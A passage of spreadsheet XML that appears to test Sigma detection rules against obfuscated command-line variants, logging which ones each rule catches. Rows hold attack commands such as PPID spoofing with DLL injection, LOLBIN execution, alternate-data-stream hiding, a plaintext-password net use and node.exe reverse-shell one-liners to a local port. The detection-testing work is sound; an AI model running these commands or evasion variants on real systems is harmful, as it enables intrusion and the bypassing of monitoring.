      <c r="E3971" s="44" t="inlineStr">
        <is>
          <t>SharpImpersonation.exe technique:"CreateProcessAsUserW"</t>
        </is>
      </c>
      <c r="F3971" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3971" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3971" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3971" s="44" t="n"/>
      <c r="J3971" s="44" t="n"/>
      <c r="K3971" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3972" ht="15.75" customHeight="1" s="42">
      <c r="A3972" s="44" t="inlineStr">
        <is>
          <t>t1134.004</t>
        </is>
      </c>
      <c r="B3972" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_selectmyparent</t>
        </is>
      </c>
      <c r="C3972" s="44" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution</t>
        </is>
      </c>
      <c r="D3972" s="44" t="inlineStr">
        <is>
          <t>52ff7941-8211-46f9-84f8-9903efb7077d</t>
        </is>
      </c>
      <c r="E3972" s="44" t="inlineStr">
        <is>
          <t>powershell.exe &amp; {. "C:\AtomicRedTeam\atomics\T1134.004\src\PPID-Spoof.ps1" $ppid=Get-Process explorer | select -expand id PPID-Spoof -ppid $ppid "-spawnto" "C:\Program Files\Internet Explorer\iexplore.exe" -dllpath "C:\AtomicRedTeam\atomics\T1134.004\bin\calc.dll"}</t>
        </is>
      </c>
      <c r="F3972" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3972" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3972" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3972" s="44" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution (52ff7941-8211-46f9-84f8-9903efb7077d)</t>
        </is>
      </c>
      <c r="J3972" s="44" t="n"/>
      <c r="K3972" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3973" ht="15.75" customHeight="1" s="42">
      <c r="A3973" s="44" t="inlineStr">
        <is>
          <t>t1134.004</t>
        </is>
      </c>
      <c r="B3973" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_selectmyparent</t>
        </is>
      </c>
      <c r="C3973" s="44" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution</t>
        </is>
      </c>
      <c r="D3973" s="44" t="inlineStr">
        <is>
          <t>52ff7941-8211-46f9-84f8-9903efb7077d</t>
        </is>
      </c>
      <c r="E3973" s="44" t="inlineStr">
        <is>
          <t>powershell.exe &amp; {. "C:\AtomicRedTeam\atomics\T1134.004\src\PPID-Spoof.ps1" $ppid=Get-Process explorer | select -expand id PPID-Spoof -ppid $ppid -spawnto	"C:\Program Files\Internet Explorer\iexplore.exe" -dllpath "C:\AtomicRedTeam\atomics\T1134.004\bin\calc.dll"}</t>
        </is>
      </c>
      <c r="F3973" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3973" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3973" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3973" s="44" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution (52ff7941-8211-46f9-84f8-9903efb7077d)</t>
        </is>
      </c>
      <c r="J3973" s="44" t="n"/>
      <c r="K3973" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3974" ht="15.75" customHeight="1" s="42">
      <c r="A3974" s="44" t="inlineStr">
        <is>
          <t>t1134.004</t>
        </is>
      </c>
      <c r="B3974" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_selectmyparent</t>
        </is>
      </c>
      <c r="C3974" s="44" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution</t>
        </is>
      </c>
      <c r="D3974" s="44" t="inlineStr">
        <is>
          <t>52ff7941-8211-46f9-84f8-9903efb7077d</t>
        </is>
      </c>
      <c r="E3974" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c powershell.exe &amp; {. "C:\AtomicRedTeam\atomics\T1134.004\src\PPID-Spoof.ps1" $ppid=Get-Process explorer | select -expand id PPID-Spoof -ppid $ppid -spawn^to "C:\Program Files\Internet Explorer\iexplore.exe" -dllpath "C:\AtomicRedTeam\atomics\T1134.004\bin\calc.dll"}</t>
        </is>
      </c>
      <c r="F3974" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3974" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3974" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3974" s="44" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution (52ff7941-8211-46f9-84f8-9903efb7077d)</t>
        </is>
      </c>
      <c r="J3974" s="44" t="n"/>
      <c r="K3974" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3975" ht="15.75" customHeight="1" s="42">
      <c r="A3975" s="44" t="inlineStr">
        <is>
          <t>t1134.004</t>
        </is>
      </c>
      <c r="B3975" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_selectmyparent</t>
        </is>
      </c>
      <c r="C3975" s="44" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution</t>
        </is>
      </c>
      <c r="D3975" s="44" t="inlineStr">
        <is>
          <t>52ff7941-8211-46f9-84f8-9903efb7077d</t>
        </is>
      </c>
      <c r="E3975" s="44" t="inlineStr">
        <is>
          <t>powershell.exe &amp; {. "C:\AtomicRedTeam\atomics\T1134.004\src\PPID-Spoof.ps1" $ppid=Get-Process explorer | select -expand id PPID-Spoof -ppid $ppid  -spawnto  "C:\Program Files\Internet Explorer\iexplore.exe" -dllpath "C:\AtomicRedTeam\atomics\T1134.004\bin\calc.dll"}</t>
        </is>
      </c>
      <c r="F3975" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3975" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3975" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3975" s="44" t="inlineStr">
        <is>
          <t>HackTool - PPID Spoofing SelectMyParent Tool Execution (52ff7941-8211-46f9-84f8-9903efb7077d)</t>
        </is>
      </c>
      <c r="J3975" s="44" t="n"/>
      <c r="K3975" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3976" ht="15.75" customHeight="1" s="42">
      <c r="A3976" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B3976" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C3976" s="44" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D3976" s="44" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E3976" s="44" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share -USER:domain\user password</t>
        </is>
      </c>
      <c r="F3976" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3976" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3976" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3976" s="44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3976" s="44" t="n"/>
      <c r="K3976" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3977" ht="15.75" customHeight="1" s="42">
      <c r="A3977" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B3977" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C3977" s="44" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D3977" s="44" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E3977" s="44" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share /USER:domain\user password</t>
        </is>
      </c>
      <c r="F3977" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3977" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3977" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3977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3977" s="44" t="n"/>
      <c r="K3977" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3978" ht="15.75" customHeight="1" s="42">
      <c r="A3978" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B3978" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C3978" s="44" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D3978" s="44" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E3978" s="44" t="inlineStr">
        <is>
          <t>net use "\192.0.2.10\share" /USER:domain\user password</t>
        </is>
      </c>
      <c r="F3978" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3978" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3978" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3978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3978" s="44" t="n"/>
      <c r="K3978" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3979" ht="15.75" customHeight="1" s="42">
      <c r="A3979" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B3979" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C3979" s="44" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D3979" s="44" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E3979" s="44" t="inlineStr">
        <is>
          <t>net	use	\192.0.2.10\share	/USER:domain\user	password</t>
        </is>
      </c>
      <c r="F3979" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3979" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3979" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3979" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J3979" s="44" t="n"/>
      <c r="K3979" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3980" ht="15.75" customHeight="1" s="42">
      <c r="A3980" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B3980" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C3980" s="44" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D3980" s="44" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E3980" s="44" t="inlineStr">
        <is>
          <t>net use \192.0.2.10\share /USER:"domain\user" password</t>
        </is>
      </c>
      <c r="F3980" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3980" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3980" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3980" s="44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3980" s="44" t="n"/>
      <c r="K3980" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3981" ht="15.75" customHeight="1" s="42">
      <c r="A3981" s="44" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B3981" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_kavremover_uncommon_execution</t>
        </is>
      </c>
      <c r="C3981" s="44" t="inlineStr">
        <is>
          <t>Kavremover Dropped Binary LOLBIN Usage</t>
        </is>
      </c>
      <c r="D3981" s="44" t="inlineStr">
        <is>
          <t>d047726b-c71c-4048-a99b-2e2f50dc107d</t>
        </is>
      </c>
      <c r="E3981" s="44" t="inlineStr">
        <is>
          <t>vrem.exe	run	run-cmd	calc.exe</t>
        </is>
      </c>
      <c r="F3981" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3981" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3981" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3981" s="44" t="n"/>
      <c r="J3981" s="44" t="n"/>
      <c r="K3981" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3982" ht="15.75" customHeight="1" s="42">
      <c r="A3982" s="44" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B3982" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_kavremover_uncommon_execution</t>
        </is>
      </c>
      <c r="C3982" s="44" t="inlineStr">
        <is>
          <t>Kavremover Dropped Binary LOLBIN Usage</t>
        </is>
      </c>
      <c r="D3982" s="44" t="inlineStr">
        <is>
          <t>d047726b-c71c-4048-a99b-2e2f50dc107d</t>
        </is>
      </c>
      <c r="E3982" s="44" t="inlineStr">
        <is>
          <t>vrem.exe "run" run-cmd calc.exe</t>
        </is>
      </c>
      <c r="F3982" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3982" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3982" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3982" s="44" t="n"/>
      <c r="J3982" s="44" t="n"/>
      <c r="K3982" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3983" ht="15.75" customHeight="1" s="42">
      <c r="A3983" s="44" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B3983" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_kavremover_uncommon_execution</t>
        </is>
      </c>
      <c r="C3983" s="44" t="inlineStr">
        <is>
          <t>Kavremover Dropped Binary LOLBIN Usage</t>
        </is>
      </c>
      <c r="D3983" s="44" t="inlineStr">
        <is>
          <t>d047726b-c71c-4048-a99b-2e2f50dc107d</t>
        </is>
      </c>
      <c r="E3983" s="44" t="inlineStr">
        <is>
          <t>vrem.exe run "run-cmd" calc.exe</t>
        </is>
      </c>
      <c r="F3983" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3983" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3983" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3983" s="44" t="n"/>
      <c r="J3983" s="44" t="n"/>
      <c r="K3983" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3984" ht="15.75" customHeight="1" s="42">
      <c r="A3984" s="44" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B3984" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_kavremover_uncommon_execution</t>
        </is>
      </c>
      <c r="C3984" s="44" t="inlineStr">
        <is>
          <t>Kavremover Dropped Binary LOLBIN Usage</t>
        </is>
      </c>
      <c r="D3984" s="44" t="inlineStr">
        <is>
          <t>d047726b-c71c-4048-a99b-2e2f50dc107d</t>
        </is>
      </c>
      <c r="E3984" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c vrem.exe ru^n run-c^md calc.exe</t>
        </is>
      </c>
      <c r="F3984" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3984" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3984" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3984" s="44" t="n"/>
      <c r="J3984" s="44" t="n"/>
      <c r="K3984" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3985" ht="15.75" customHeight="1" s="42">
      <c r="A3985" s="44" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B3985" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_kavremover_uncommon_execution</t>
        </is>
      </c>
      <c r="C3985" s="44" t="inlineStr">
        <is>
          <t>Kavremover Dropped Binary LOLBIN Usage</t>
        </is>
      </c>
      <c r="D3985" s="44" t="inlineStr">
        <is>
          <t>d047726b-c71c-4048-a99b-2e2f50dc107d</t>
        </is>
      </c>
      <c r="E3985" s="44" t="inlineStr">
        <is>
          <t>vrem.exe run  run-cmd  calc.exe</t>
        </is>
      </c>
      <c r="F3985" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3985" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3985" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3985" s="44" t="n"/>
      <c r="J3985" s="44" t="n"/>
      <c r="K3985" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3986" ht="15.75" customHeight="1" s="42">
      <c r="A3986" s="44" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B3986" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_vsiisexelauncher</t>
        </is>
      </c>
      <c r="C3986" s="44" t="inlineStr">
        <is>
          <t>Use of VSIISExeLauncher.exe</t>
        </is>
      </c>
      <c r="D3986" s="44" t="inlineStr">
        <is>
          <t>18749301-f1c5-4efc-a4c3-276ff1f5b6f8</t>
        </is>
      </c>
      <c r="E3986" s="44" t="inlineStr">
        <is>
          <t>VSIISExeLauncher.exe /p calc.exe /a ""</t>
        </is>
      </c>
      <c r="F3986" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3986" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3986" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3986" s="44" t="n"/>
      <c r="J3986" s="44" t="n"/>
      <c r="K3986" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3987" ht="15.75" customHeight="1" s="42">
      <c r="A3987" s="44" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B3987" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_vsiisexelauncher</t>
        </is>
      </c>
      <c r="C3987" s="44" t="inlineStr">
        <is>
          <t>Use of VSIISExeLauncher.exe</t>
        </is>
      </c>
      <c r="D3987" s="44" t="inlineStr">
        <is>
          <t>18749301-f1c5-4efc-a4c3-276ff1f5b6f8</t>
        </is>
      </c>
      <c r="E3987" s="44" t="inlineStr">
        <is>
          <t>VSIISExeLauncher.exe "-p" calc.exe "-a"</t>
        </is>
      </c>
      <c r="F3987" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3987" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3987" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3987" s="44" t="n"/>
      <c r="J3987" s="44" t="n"/>
      <c r="K3987" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3988" ht="15.75" customHeight="1" s="42">
      <c r="A3988" s="44" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B3988" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_vsiisexelauncher</t>
        </is>
      </c>
      <c r="C3988" s="44" t="inlineStr">
        <is>
          <t>Use of VSIISExeLauncher.exe</t>
        </is>
      </c>
      <c r="D3988" s="44" t="inlineStr">
        <is>
          <t>18749301-f1c5-4efc-a4c3-276ff1f5b6f8</t>
        </is>
      </c>
      <c r="E3988" s="44" t="inlineStr">
        <is>
          <t>VSIISExeLauncher.exe    -p calc.exe    -a ""</t>
        </is>
      </c>
      <c r="F3988" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3988" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3988" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3988" s="44" t="n"/>
      <c r="J3988" s="44" t="n"/>
      <c r="K3988" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3989" ht="15.75" customHeight="1" s="42">
      <c r="A3989" s="44" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B3989" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_vsiisexelauncher</t>
        </is>
      </c>
      <c r="C3989" s="44" t="inlineStr">
        <is>
          <t>Use of VSIISExeLauncher.exe</t>
        </is>
      </c>
      <c r="D3989" s="44" t="inlineStr">
        <is>
          <t>18749301-f1c5-4efc-a4c3-276ff1f5b6f8</t>
        </is>
      </c>
      <c r="E3989" s="44" t="inlineStr">
        <is>
          <t>VSIISExeLauncher.exe -a "" -p calc.exe</t>
        </is>
      </c>
      <c r="F3989" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3989" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3989" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3989" s="44" t="n"/>
      <c r="J3989" s="44" t="n"/>
      <c r="K3989" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3990" ht="15.75" customHeight="1" s="42">
      <c r="A3990" s="44" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B3990" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_node_abuse</t>
        </is>
      </c>
      <c r="C3990" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Code Execution Via Node.EXE</t>
        </is>
      </c>
      <c r="D3990" s="44" t="inlineStr">
        <is>
          <t>6640f31c-01ad-49b5-beb5-83498a5cd8bd</t>
        </is>
      </c>
      <c r="E3990" s="44" t="inlineStr">
        <is>
          <t>node.exe -e "const cp = require('child_process'); const client = new (require('net').Socket)(); client.connect(4444, '127.0.0.1', () =&gt; { cp.exec('cmd.exe', { input: client }); });"</t>
        </is>
      </c>
      <c r="F3990" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3990" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3990" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3990" s="44" t="n"/>
      <c r="J3990" s="44" t="n"/>
      <c r="K3990" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3991" ht="15.75" customHeight="1" s="42">
      <c r="A3991" s="44" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B3991" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_node_abuse</t>
        </is>
      </c>
      <c r="C3991" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Code Execution Via Node.EXE</t>
        </is>
      </c>
      <c r="D3991" s="44" t="inlineStr">
        <is>
          <t>6640f31c-01ad-49b5-beb5-83498a5cd8bd</t>
        </is>
      </c>
      <c r="E3991" s="44" t="inlineStr">
        <is>
          <t>node.exe -e "const { exec } = require('child_process'); require('net')['sock' + 'et']"</t>
        </is>
      </c>
      <c r="F3991" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3991" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3991" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3991" s="44" t="n"/>
      <c r="J3991" s="44" t="n"/>
      <c r="K3991" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3992" ht="15.75" customHeight="1" s="42">
      <c r="A3992" s="44" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B3992" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_node_abuse</t>
        </is>
      </c>
      <c r="C3992" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Code Execution Via Node.EXE</t>
        </is>
      </c>
      <c r="D3992" s="44" t="inlineStr">
        <is>
          <t>6640f31c-01ad-49b5-beb5-83498a5cd8bd</t>
        </is>
      </c>
      <c r="E3992" s="44" t="inlineStr">
        <is>
          <t>node.exe	--eval	"const cp = require('child_process'); const n = require('net'); const s = new n.Socket(); s.connect(4444, '127.0.0.1'); cp.exec('whoami');"</t>
        </is>
      </c>
      <c r="F3992" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3992" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3992" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3992" s="44" t="n"/>
      <c r="J3992" s="44" t="n"/>
      <c r="K3992" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3993" ht="15.75" customHeight="1" s="42">
      <c r="A3993" s="44" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B3993" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_node_abuse</t>
        </is>
      </c>
      <c r="C3993" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Code Execution Via Node.EXE</t>
        </is>
      </c>
      <c r="D3993" s="44" t="inlineStr">
        <is>
          <t>6640f31c-01ad-49b5-beb5-83498a5cd8bd</t>
        </is>
      </c>
      <c r="E3993" s="44" t="inlineStr">
        <is>
          <t>node.exe --print "const cp = require('child_process'); const n = require('net'); const s = new n.Socket(); s.connect(4444, '127.0.0.1'); cp.exec('whoami');"</t>
        </is>
      </c>
      <c r="F3993" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3993" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3993" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3993" s="44" t="n"/>
      <c r="J3993" s="44" t="n"/>
      <c r="K3993" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3994" ht="15.75" customHeight="1" s="42">
      <c r="A3994" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B3994" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_diantz_ads</t>
        </is>
      </c>
      <c r="C3994" s="44" t="inlineStr">
        <is>
          <t>Suspicious Diantz Alternate Data Stream Execution</t>
        </is>
      </c>
      <c r="D3994" s="44" t="inlineStr">
        <is>
          <t>6b369ced-4b1d-48f1-b427-fdc0de0790bd</t>
        </is>
      </c>
      <c r="E3994" s="44" t="inlineStr">
        <is>
          <t>diantz.exe C:\Temp\test.txt "C:\Temp\test.txt:file.cab"</t>
        </is>
      </c>
      <c r="F3994" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3994" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3994" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3994" s="44" t="n"/>
      <c r="J3994" s="44" t="n"/>
      <c r="K3994" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3995" ht="15.75" customHeight="1" s="42">
      <c r="A3995" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B3995" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_diantz_ads</t>
        </is>
      </c>
      <c r="C3995" s="44" t="inlineStr">
        <is>
          <t>Suspicious Diantz Alternate Data Stream Execution</t>
        </is>
      </c>
      <c r="D3995" s="44" t="inlineStr">
        <is>
          <t>6b369ced-4b1d-48f1-b427-fdc0de0790bd</t>
        </is>
      </c>
      <c r="E3995" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c dian^tz.exe C:\Temp\test.txt C:\Temp\test.txt:file.cab</t>
        </is>
      </c>
      <c r="F3995" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3995" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3995" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3995" s="44" t="n"/>
      <c r="J3995" s="44" t="n"/>
      <c r="K3995" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3996" ht="15.75" customHeight="1" s="42">
      <c r="A3996" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B3996" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_extrac32_ads</t>
        </is>
      </c>
      <c r="C3996" s="44" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Alternate Data Stream Execution</t>
        </is>
      </c>
      <c r="D3996" s="44" t="inlineStr">
        <is>
          <t>4b13db67-0c45-40f1-aba8-66a1a7198a1e</t>
        </is>
      </c>
      <c r="E3996" s="44" t="inlineStr">
        <is>
          <t>extrac32.exe C:\Temp\test.cab "C:\Temp\test.txt:hidden.txt"</t>
        </is>
      </c>
      <c r="F3996" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3996" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3996" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3996" s="44" t="inlineStr">
        <is>
          <t>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J3996" s="44" t="n"/>
      <c r="K3996" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3997" ht="15.75" customHeight="1" s="42">
      <c r="A3997" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B3997" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_extrac32_ads</t>
        </is>
      </c>
      <c r="C3997" s="44" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Alternate Data Stream Execution</t>
        </is>
      </c>
      <c r="D3997" s="44" t="inlineStr">
        <is>
          <t>4b13db67-0c45-40f1-aba8-66a1a7198a1e</t>
        </is>
      </c>
      <c r="E3997" s="44" t="inlineStr">
        <is>
          <t>extrac32.exe C:\Temp\test.cab C:\Temp\test.txt:\hidden.txt</t>
        </is>
      </c>
      <c r="F3997" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3997" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3997" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3997" s="44" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Execution (aa8e035d-7be4-48d3-a944-102aec04400d)</t>
        </is>
      </c>
      <c r="J3997" s="44" t="n"/>
      <c r="K3997" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3998" ht="15.75" customHeight="1" s="42">
      <c r="A3998" s="44" t="inlineStr">
        <is>
          <t>t1564.004</t>
        </is>
      </c>
      <c r="B3998" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_extrac32_ads</t>
        </is>
      </c>
      <c r="C3998" s="44" t="inlineStr">
        <is>
